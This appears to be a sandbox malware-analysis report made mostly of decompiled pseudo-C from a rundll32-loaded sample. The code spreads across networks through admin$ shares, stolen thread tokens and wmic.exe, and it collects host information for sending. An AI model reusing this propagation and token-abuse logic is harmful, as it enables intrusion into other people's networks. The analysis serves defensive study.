                                                                                                                                                  								__eflags = _v20 - _t189;
                                                                                                                                                  								if(_v20 != _t189) {
                                                                                                                                                  									CloseHandle(_v20);
                                                                                                                                                  								}
                                                                                                                                                  								_t199 = 1;
                                                                                                                                                  								__eflags = 1;
                                                                                                                                                  								L48:
                                                                                                                                                  								__eflags = _v24;
                                                                                                                                                  								if(_v24 == 0) {
                                                                                                                                                  									WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                                                                  								}
                                                                                                                                                  								goto L51;
                                                                                                                                                  							}
                                                                                                                                                  							_t163 = E04779972(_t205 + wsprintfW( &_v74428, L"%ws ",  &_v2748) * 2 - 0x122b8, __eflags, _a4, _a8, _a12);
                                                                                                                                                  							__eflags = _t163;
                                                                                                                                                  							if(_t163 == 0) {
                                                                                                                                                  								L37:
                                                                                                                                                  								_t151 = GetLastError();
                                                                                                                                                  								_t189 = 0;
                                                                                                                                                  								L39:
                                                                                                                                                  								_v8 = _t151;
                                                                                                                                                  								L40:
                                                                                                                                                  								__eflags = _v16 - _t189;
                                                                                                                                                  								if(_v16 != _t189) {
                                                                                                                                                  									goto L43;
                                                                                                                                                  								}
                                                                                                                                                  								goto L41;
                                                                                                                                                  							}
                                                                                                                                                  							_push( &_v44);
                                                                                                                                                  							_push( &_v116);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push(0x8000000);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_push( &_v74428);
                                                                                                                                                  							_push( &_v2748);
                                                                                                                                                  							__eflags = _v12;
                                                                                                                                                  							if(_v12 == 0) {
                                                                                                                                                  								_t168 = CreateProcessW();
                                                                                                                                                  							} else {
                                                                                                                                                  								_t168 = CreateProcessAsUserW(_v12, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t168;
                                                                                                                                                  							if(_t168 == 0) {
                                                                                                                                                  								goto L37;
                                                                                                                                                  							} else {
                                                                                                                                                  								WaitForSingleObject(_v44, 0xffffffff);
                                                                                                                                                  								_a4 = 0;
                                                                                                                                                  								GetExitCodeProcess(_v44,  &_a4);
                                                                                                                                                  								__eflags = _v52;
                                                                                                                                                  								if(_v52 != 0) {
                                                                                                                                                  									CloseHandle(_v52);
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _v60;
                                                                                                                                                  								if(_v60 != 0) {
                                                                                                                                                  									CloseHandle(_v60);
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _v56;
                                                                                                                                                  								if(_v56 != 0) {
                                                                                                                                                  									CloseHandle(_v56);
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _v40;
                                                                                                                                                  								if(_v40 != 0) {
                                                                                                                                                  									CloseHandle(_v40);
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _v44;
                                                                                                                                                  								if(_v44 != 0) {
                                                                                                                                                  									CloseHandle(_v44);
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _a4;
                                                                                                                                                  								_t173 = 0 | _a4 == 0x00000000;
                                                                                                                                                  								_v16 = _t173;
                                                                                                                                                  								__eflags = _t173;
                                                                                                                                                  								if(_t173 != 0) {
                                                                                                                                                  									_t189 = 0;
                                                                                                                                                  									__eflags = 0;
                                                                                                                                                  									goto L43;
                                                                                                                                                  								} else {
                                                                                                                                                  									_v16 = PathFileExistsW( &_v4796);
                                                                                                                                                  									_t189 = 0;
                                                                                                                                                  									goto L40;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t184 = GetLastError();
                                                                                                                                                  					_v8 = _t184;
                                                                                                                                                  					if(_t184 == 0x50 || _t184 == 0x35 || _t184 == 0x43 || _v24 != 0x4c3) {
                                                                                                                                                  						goto L48;
                                                                                                                                                  					} else {
                                                                                                                                                  						if(_v28 != 0) {
                                                                                                                                                  							goto L51;
                                                                                                                                                  						}
                                                                                                                                                  						WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                                                                  						_v28 = _t199;
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_v16 = _t199;
                                                                                                                                                  				goto L48;
                                                                                                                                                  			}












































                                                                                                                                                  0x04779b6b
                                                                                                                                                  0x04779b75
                                                                                                                                                  0x04779b78
                                                                                                                                                  0x04779b7b
                                                                                                                                                  0x04779b81
                                                                                                                                                  0x04779f01
                                                                                                                                                  0x04779f08
                                                                                                                                                  0x04779f08
                                                                                                                                                  0x04779f0b
                                                                                                                                                  0x04779f0d
                                                                                                                                                  0x04779f12
                                                                                                                                                  0x04779f12
                                                                                                                                                  0x04779f17
                                                                                                                                                  0x04779f24
                                                                                                                                                  0x04779f24
                                                                                                                                                  0x04779b92
                                                                                                                                                  0x04779ba5
                                                                                                                                                  0x04779baa
                                                                                                                                                  0x04779bb4
                                                                                                                                                  0x04779bbb
                                                                                                                                                  0x04779bc3
                                                                                                                                                  0x04779bce
                                                                                                                                                  0x04779bd0
                                                                                                                                                  0x04779bd6
                                                                                                                                                  0x04779be5
                                                                                                                                                  0x04779bf2
                                                                                                                                                  0x04779bf6
                                                                                                                                                  0x04779bfd
                                                                                                                                                  0x04779c16
                                                                                                                                                  0x04779c22
                                                                                                                                                  0x04779c2a
                                                                                                                                                  0x04779c2e
                                                                                                                                                  0x04779c2e
                                                                                                                                                  0x04779c41
                                                                                                                                                  0x04779c46
                                                                                                                                                  0x04779c4a
                                                                                                                                                  0x04779c5f
                                                                                                                                                  0x04779c71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779c85
                                                                                                                                                  0x04779c8f
                                                                                                                                                  0x04779c94
                                                                                                                                                  0x04779c98
                                                                                                                                                  0x04779cf3
                                                                                                                                                  0x04779cf6
                                                                                                                                                  0x04779cf8
                                                                                                                                                  0x04779cfb
                                                                                                                                                  0x04779d03
                                                                                                                                                  0x04779d08
                                                                                                                                                  0x04779d08
                                                                                                                                                  0x04779cfb
                                                                                                                                                  0x04779d15
                                                                                                                                                  0x04779d18
                                                                                                                                                  0x04779d22
                                                                                                                                                  0x04779d28
                                                                                                                                                  0x04779d2a
                                                                                                                                                  0x04779d3c
                                                                                                                                                  0x04779d3c
                                                                                                                                                  0x04779d44
                                                                                                                                                  0x04779d4b
                                                                                                                                                  0x04779d52
                                                                                                                                                  0x04779d58
                                                                                                                                                  0x04779d59
                                                                                                                                                  0x04779d5c
                                                                                                                                                  0x04779d62
                                                                                                                                                  0x04779d6c
                                                                                                                                                  0x04779d7c
                                                                                                                                                  0x04779d83
                                                                                                                                                  0x04779d8a
                                                                                                                                                  0x04779d96
                                                                                                                                                  0x04779d98
                                                                                                                                                  0x04779eb0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779d9e
                                                                                                                                                  0x04779daa
                                                                                                                                                  0x04779dbd
                                                                                                                                                  0x04779dbf
                                                                                                                                                  0x04779ebe
                                                                                                                                                  0x04779ec5
                                                                                                                                                  0x04779ecf
                                                                                                                                                  0x04779ecf
                                                                                                                                                  0x04779ed2
                                                                                                                                                  0x04779ed7
                                                                                                                                                  0x04779ed9
                                                                                                                                                  0x04779ed9
                                                                                                                                                  0x04779edc
                                                                                                                                                  0x04779edf
                                                                                                                                                  0x04779ee4
                                                                                                                                                  0x04779ee4
                                                                                                                                                  0x04779ee8
                                                                                                                                                  0x04779ee8
                                                                                                                                                  0x04779ee9
                                                                                                                                                  0x04779ee9
                                                                                                                                                  0x04779eed
                                                                                                                                                  0x04779ef9
                                                                                                                                                  0x04779ef9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779eed
                                                                                                                                                  0x04779ded
                                                                                                                                                  0x04779df2
                                                                                                                                                  0x04779df4
                                                                                                                                                  0x04779ea6
                                                                                                                                                  0x04779ea6
                                                                                                                                                  0x04779eac
                                                                                                                                                  0x04779eb6
                                                                                                                                                  0x04779eb6
                                                                                                                                                  0x04779eb9
                                                                                                                                                  0x04779eb9
                                                                                                                                                  0x04779ebc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779ebc
                                                                                                                                                  0x04779dfd
                                                                                                                                                  0x04779e03
                                                                                                                                                  0x04779e04
                                                                                                                                                  0x04779e05
                                                                                                                                                  0x04779e06
                                                                                                                                                  0x04779e0b
                                                                                                                                                  0x04779e0c
                                                                                                                                                  0x04779e13
                                                                                                                                                  0x04779e14
                                                                                                                                                  0x04779e1b
                                                                                                                                                  0x04779e1c
                                                                                                                                                  0x04779e1f
                                                                                                                                                  0x04779e2c
                                                                                                                                                  0x04779e21
                                                                                                                                                  0x04779e24
                                                                                                                                                  0x04779e24
                                                                                                                                                  0x04779e32
                                                                                                                                                  0x04779e34
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779e36
                                                                                                                                                  0x04779e3b
                                                                                                                                                  0x04779e48
                                                                                                                                                  0x04779e4b
                                                                                                                                                  0x04779e51
                                                                                                                                                  0x04779e54
                                                                                                                                                  0x04779e59
                                                                                                                                                  0x04779e59
                                                                                                                                                  0x04779e5b
                                                                                                                                                  0x04779e5e
                                                                                                                                                  0x04779e63
                                                                                                                                                  0x04779e63
                                                                                                                                                  0x04779e65
                                                                                                                                                  0x04779e68
                                                                                                                                                  0x04779e6d
                                                                                                                                                  0x04779e6d
                                                                                                                                                  0x04779e6f
                                                                                                                                                  0x04779e72
                                                                                                                                                  0x04779e77
                                                                                                                                                  0x04779e77
                                                                                                                                                  0x04779e79
                                                                                                                                                  0x04779e7c
                                                                                                                                                  0x04779e81
                                                                                                                                                  0x04779e81
                                                                                                                                                  0x04779e85
                                                                                                                                                  0x04779e88
                                                                                                                                                  0x04779e8b
                                                                                                                                                  0x04779e8e
                                                                                                                                                  0x04779e90
                                                                                                                                                  0x04779ecd
                                                                                                                                                  0x04779ecd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779e92
                                                                                                                                                  0x04779e9f
                                                                                                                                                  0x04779ea2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779ea2
                                                                                                                                                  0x04779e90
                                                                                                                                                  0x04779e34
                                                                                                                                                  0x04779d98
                                                                                                                                                  0x04779c9a
                                                                                                                                                  0x04779ca0
                                                                                                                                                  0x04779ca6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779ccb
                                                                                                                                                  0x04779cce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779cdd
                                                                                                                                                  0x04779ce3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779ce3
                                                                                                                                                  0x04779ca6
                                                                                                                                                  0x04779ceb
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfW.USER32 ref: 04779BA5
                                                                                                                                                    • Part of subcall function 047788D3: PathFindFileNameW.SHLWAPI(04787BC8,7491C0B0,?,047795B2), ref: 047788E3
                                                                                                                                                  • wsprintfW.USER32 ref: 04779BF2
                                                                                                                                                  • wsprintfW.USER32 ref: 04779C16
                                                                                                                                                  • PathFindExtensionW.SHLWAPI(?), ref: 04779C22
                                                                                                                                                  • wsprintfW.USER32 ref: 04779C41
                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04779C59
                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 04779C69
                                                                                                                                                  • GetLastError.KERNEL32 ref: 04779C73
                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 04779C9A
                                                                                                                                                  • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04779CDD
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 04779D1B
                                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000), ref: 04779D22
                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 04779D3C
                                                                                                                                                  • memset.MSVCRT ref: 04779D62
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32 ref: 04779D8A
                                                                                                                                                  • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 04779DAA
                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 04779DB7
                                                                                                                                                  • wsprintfW.USER32 ref: 04779DD8
                                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 04779E24
                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 04779E2C
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 04779E3B
                                                                                                                                                  • GetExitCodeProcess.KERNEL32 ref: 04779E4B
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04779E59
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04779E63
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04779E6D
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04779E77
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04779E81
                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 04779E99
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 04779EA6
                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 04779EC5
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 04779ED7
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 04779EE4
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000008,?,7491C0B0,00000000), ref: 047768EB
                                                                                                                                                    • Part of subcall function 047768B5: HeapAlloc.KERNEL32(00000000), ref: 047768F4
                                                                                                                                                    • Part of subcall function 047768B5: memcpy.MSVCRT ref: 04776921
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000008,?,74CB4D40), ref: 04776946
                                                                                                                                                    • Part of subcall function 047768B5: HeapAlloc.KERNEL32(00000000), ref: 04776949
                                                                                                                                                    • Part of subcall function 047768B5: memcpy.MSVCRT ref: 04776978
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04776995
                                                                                                                                                    • Part of subcall function 047768B5: HeapFree.KERNEL32(00000000), ref: 04776998
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0477699F
                                                                                                                                                    • Part of subcall function 047768B5: HeapFree.KERNEL32(00000000), ref: 047769A2
                                                                                                                                                  • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04779EF9
                                                                                                                                                  • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,04779FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 04779F17
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                                                                                                                                  • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                                                                                                                                  • API String ID: 659518118-2685502051
                                                                                                                                                  • Opcode ID: 7144a5c2342bf0014ebe651ffc72f59807d749aa79bbcbd5bafe0188be4f7bc7
                                                                                                                                                  • Instruction ID: d9d482884d8f608b69a520d2cb915cb29b0b768298a41ecd6e0b85b202689a0c
                                                                                                                                                  • Opcode Fuzzy Hash: 7144a5c2342bf0014ebe651ffc72f59807d749aa79bbcbd5bafe0188be4f7bc7
                                                                                                                                                  • Instruction Fuzzy Hash: 60B12BB1901219EFEF21DFA4CC88ADEBBB9FF44304F50456AE609E2210D774AA85DF51
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E047757E5(long _a4, void _a8, void* _a12, intOrPtr _a16) {
                                                                                                                                                  				int _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				int _v20;
                                                                                                                                                  				struct _TIME_ZONE_INFORMATION _v192;
                                                                                                                                                  				void** _t62;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				long _t69;
                                                                                                                                                  				signed int _t73;
                                                                                                                                                  				signed int _t74;
                                                                                                                                                  				void* _t88;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				void* _t96;
                                                                                                                                                  				int _t101;
                                                                                                                                                  				long _t102;
                                                                                                                                                  				int _t103;
                                                                                                                                                  				void _t104;
                                                                                                                                                  				void _t105;
                                                                                                                                                  				void* _t106;
                                                                                                                                                  				void* _t107;
                                                                                                                                                  				void* _t108;
                                                                                                                                                  				int _t109;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				void* _t111;
                                                                                                                                                  				void* _t113;
                                                                                                                                                  				void* _t114;
                                                                                                                                                  				void* _t115;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  
                                                                                                                                                  				_t109 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				if(_a16 != 0) {
                                                                                                                                                  					_t96 = LocalAlloc(0x40, 0xf0);
                                                                                                                                                  					_v12 = _t96;
                                                                                                                                                  					if(_t96 != 0) {
                                                                                                                                                  						 *_t96 = _a8;
                                                                                                                                                  						 *((intOrPtr*)(_t96 + 4)) = GetSystemDefaultLCID();
                                                                                                                                                  						if(GetTimeZoneInformation( &_v192) != 0xffffffff) {
                                                                                                                                                  							 *(_t96 + 8) = _v192.Bias;
                                                                                                                                                  						}
                                                                                                                                                  						_t10 = _t96 + 0xc; // 0xc
                                                                                                                                                  						memcpy(_t10, _a12, 0x21);
                                                                                                                                                  						_t116 = _t115 + 0xc;
                                                                                                                                                  						_t62 =  &_v16;
                                                                                                                                                  						_v16 = _t109;
                                                                                                                                                  						__imp__NetWkstaGetInfo(0x4780494, 0x64, _t62, _t111);
                                                                                                                                                  						if(_t62 == 0) {
                                                                                                                                                  							_t114 = _v16;
                                                                                                                                                  							if( *(_t114 + 8) != _t109) {
                                                                                                                                                  								_t91 =  *(_t114 + 8);
                                                                                                                                                  								_t108 = _t91 + 2;
                                                                                                                                                  								do {
                                                                                                                                                  									_t105 =  *_t91;
                                                                                                                                                  									_t91 = _t91 + 2;
                                                                                                                                                  								} while (_t105 != _t109);
                                                                                                                                                  								_t109 = (_t91 - _t108 >> 1) + (_t91 - _t108 >> 1) + 2;
                                                                                                                                                  							}
                                                                                                                                                  							_t101 = 0;
                                                                                                                                                  							if( *(_t114 + 4) != 0) {
                                                                                                                                                  								_t88 =  *(_t114 + 4);
                                                                                                                                                  								_t107 = _t88 + 2;
                                                                                                                                                  								do {
                                                                                                                                                  									_t104 =  *_t88;
                                                                                                                                                  									_t88 = _t88 + 2;
                                                                                                                                                  								} while (_t104 != 0);
                                                                                                                                                  								_t101 = (_t88 - _t107 >> 1) + (_t88 - _t107 >> 1) + 2;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t109 != 0 && _t109 <= 0xc3) {
                                                                                                                                                  								memcpy(_v12 + 0x2d,  *(_t114 + 8), _t109);
                                                                                                                                                  								_t116 = _t116 + 0xc;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t101 != 0 && _t101 <= 0xc3 - _t109) {
                                                                                                                                                  								_t29 = _v12 + 0x2d; // 0x2d
                                                                                                                                                  								memcpy(_t109 + _t29,  *(_t114 + 4), _t101);
                                                                                                                                                  								_t116 = _t116 + 0xc;
                                                                                                                                                  							}
                                                                                                                                                  							NetApiBufferFree(_t114);
                                                                                                                                                  							_t96 = _v12;
                                                                                                                                                  							_t109 = 0;
                                                                                                                                                  						}
                                                                                                                                                  						_a12 = _t109;
                                                                                                                                                  						_v8 = _t109;
                                                                                                                                                  						if(E047756D8( &_v8, _a4, _t96,  &_a12) != 0) {
                                                                                                                                                  							_t69 = _v8 + 9;
                                                                                                                                                  							_a4 = _t69;
                                                                                                                                                  							_t113 = LocalAlloc(0x40, _t69);
                                                                                                                                                  							if(_t113 != _t109) {
                                                                                                                                                  								 *(_t113 + 1) = _a8;
                                                                                                                                                  								 *_t113 = 0x66;
                                                                                                                                                  								_t41 = _t113 + 5; // 0x5
                                                                                                                                                  								_t73 = memcpy(_t41, _a12, _v8);
                                                                                                                                                  								_t103 = _v8;
                                                                                                                                                  								_t106 = _t103 + 5;
                                                                                                                                                  								_t74 = _t73 | 0xffffffff;
                                                                                                                                                  								_t110 = _t113;
                                                                                                                                                  								if(_t106 != 0) {
                                                                                                                                                  									do {
                                                                                                                                                  										_t74 = _t74 >> 0x00000008 ^  *(0x4783078 + (( *_t110 & 0x000000ff ^ _t74) & 0x000000ff) * 4);
                                                                                                                                                  										_t110 = _t110 + 1;
                                                                                                                                                  										_t106 = _t106 - 1;
                                                                                                                                                  									} while (_t106 != 0);
                                                                                                                                                  									_t96 = _v12;
                                                                                                                                                  								}
                                                                                                                                                  								 *(_t113 + _t103 + 5) =  !_t74;
                                                                                                                                                  								_v20 = E04775780(_t103, _t113, _a4, _a16);
                                                                                                                                                  								LocalFree(_t113);
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t102 = 0xf0;
                                                                                                                                                  						_t66 = _t96;
                                                                                                                                                  						do {
                                                                                                                                                  							 *_t66 = 0;
                                                                                                                                                  							_t66 = _t66 + 1;
                                                                                                                                                  							_t102 = _t102 - 1;
                                                                                                                                                  						} while (_t102 != 0);
                                                                                                                                                  						LocalFree(_t96);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v20;
                                                                                                                                                  			}































                                                                                                                                                  0x047757ef
                                                                                                                                                  0x047757f1
                                                                                                                                                  0x047757f7
                                                                                                                                                  0x0477580b
                                                                                                                                                  0x0477580d
                                                                                                                                                  0x04775812
                                                                                                                                                  0x0477581b
                                                                                                                                                  0x04775823
                                                                                                                                                  0x04775836
                                                                                                                                                  0x0477583e
                                                                                                                                                  0x0477583e
                                                                                                                                                  0x04775847
                                                                                                                                                  0x0477584b
                                                                                                                                                  0x04775850
                                                                                                                                                  0x04775853
                                                                                                                                                  0x0477585e
                                                                                                                                                  0x04775861
                                                                                                                                                  0x04775869
                                                                                                                                                  0x0477586f
                                                                                                                                                  0x04775875
                                                                                                                                                  0x04775877
                                                                                                                                                  0x0477587a
                                                                                                                                                  0x0477587d
                                                                                                                                                  0x0477587d
                                                                                                                                                  0x04775880
                                                                                                                                                  0x04775883
                                                                                                                                                  0x0477588c
                                                                                                                                                  0x0477588c
                                                                                                                                                  0x04775890
                                                                                                                                                  0x04775895
                                                                                                                                                  0x04775897
                                                                                                                                                  0x0477589a
                                                                                                                                                  0x0477589d
                                                                                                                                                  0x0477589d
                                                                                                                                                  0x047758a0
                                                                                                                                                  0x047758a3
                                                                                                                                                  0x047758ac
                                                                                                                                                  0x047758ac
                                                                                                                                                  0x047758b2
                                                                                                                                                  0x047758c7
                                                                                                                                                  0x047758cc
                                                                                                                                                  0x047758cc
                                                                                                                                                  0x047758d1
                                                                                                                                                  0x047758e5
                                                                                                                                                  0x047758ea
                                                                                                                                                  0x047758ef
                                                                                                                                                  0x047758ef
                                                                                                                                                  0x047758f3
                                                                                                                                                  0x047758f9
                                                                                                                                                  0x047758fc
                                                                                                                                                  0x047758fc
                                                                                                                                                  0x04775909
                                                                                                                                                  0x0477590c
                                                                                                                                                  0x04775916
                                                                                                                                                  0x0477591b
                                                                                                                                                  0x04775921
                                                                                                                                                  0x0477592a
                                                                                                                                                  0x0477592e
                                                                                                                                                  0x04775933
                                                                                                                                                  0x04775936
                                                                                                                                                  0x0477593c
                                                                                                                                                  0x04775943
                                                                                                                                                  0x04775948
                                                                                                                                                  0x0477594b
                                                                                                                                                  0x04775951
                                                                                                                                                  0x04775954
                                                                                                                                                  0x04775958
                                                                                                                                                  0x0477595a
                                                                                                                                                  0x04775968
                                                                                                                                                  0x0477596f
                                                                                                                                                  0x04775970
                                                                                                                                                  0x04775970
                                                                                                                                                  0x04775973
                                                                                                                                                  0x04775973
                                                                                                                                                  0x0477597e
                                                                                                                                                  0x04775989
                                                                                                                                                  0x0477598c
                                                                                                                                                  0x0477598c
                                                                                                                                                  0x0477592e
                                                                                                                                                  0x04775992
                                                                                                                                                  0x04775997
                                                                                                                                                  0x0477599a
                                                                                                                                                  0x0477599a
                                                                                                                                                  0x0477599d
                                                                                                                                                  0x0477599e
                                                                                                                                                  0x0477599e
                                                                                                                                                  0x047759a2
                                                                                                                                                  0x047759a2
                                                                                                                                                  0x047759a8
                                                                                                                                                  0x047759ae

                                                                                                                                                  APIs
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 04775805
                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32 ref: 0477581D
                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0477582D
                                                                                                                                                  • memcpy.MSVCRT ref: 0477584B
                                                                                                                                                  • NetWkstaGetInfo.NETAPI32(04780494,00000064,?), ref: 04775861
                                                                                                                                                  • memcpy.MSVCRT ref: 047758C7
                                                                                                                                                  • memcpy.MSVCRT ref: 047758EA
                                                                                                                                                  • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 047758F3
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 04775924
                                                                                                                                                  • memcpy.MSVCRT ref: 04775943
                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 0477598C
                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 047759A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2529142246-0
                                                                                                                                                  • Opcode ID: 6230d85f98d345670741cf4ed94b3cecb8bcb93d1fd2f109e0277f4bfdd31b09
                                                                                                                                                  • Instruction ID: 56550b6da26ed3d5ed194d318448452a564a8953e437fe83352dd2051e539f85
                                                                                                                                                  • Opcode Fuzzy Hash: 6230d85f98d345670741cf4ed94b3cecb8bcb93d1fd2f109e0277f4bfdd31b09
                                                                                                                                                  • Instruction Fuzzy Hash: F351A17190030AEFEF20DF68C884EAEBBA9FF48314F458969E95597741E775EA00CB50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 17%
                                                                                                                                                  			E04778D39(intOrPtr _a4) {
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				long _v28;
                                                                                                                                                  				char _v32;
                                                                                                                                                  				char _v36;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				char _v48;
                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                  				char _v56;
                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                  				char _v64;
                                                                                                                                                  				char _v584;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				char* _t58;
                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                  				signed int _t83;
                                                                                                                                                  				intOrPtr* _t85;
                                                                                                                                                  				void* _t86;
                                                                                                                                                  				signed int _t88;
                                                                                                                                                  				intOrPtr* _t89;
                                                                                                                                                  
                                                                                                                                                  				_t83 = 0;
                                                                                                                                                  				_t88 = 0;
                                                                                                                                                  				_v48 = 0;
                                                                                                                                                  				_v44 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v28 = 0;
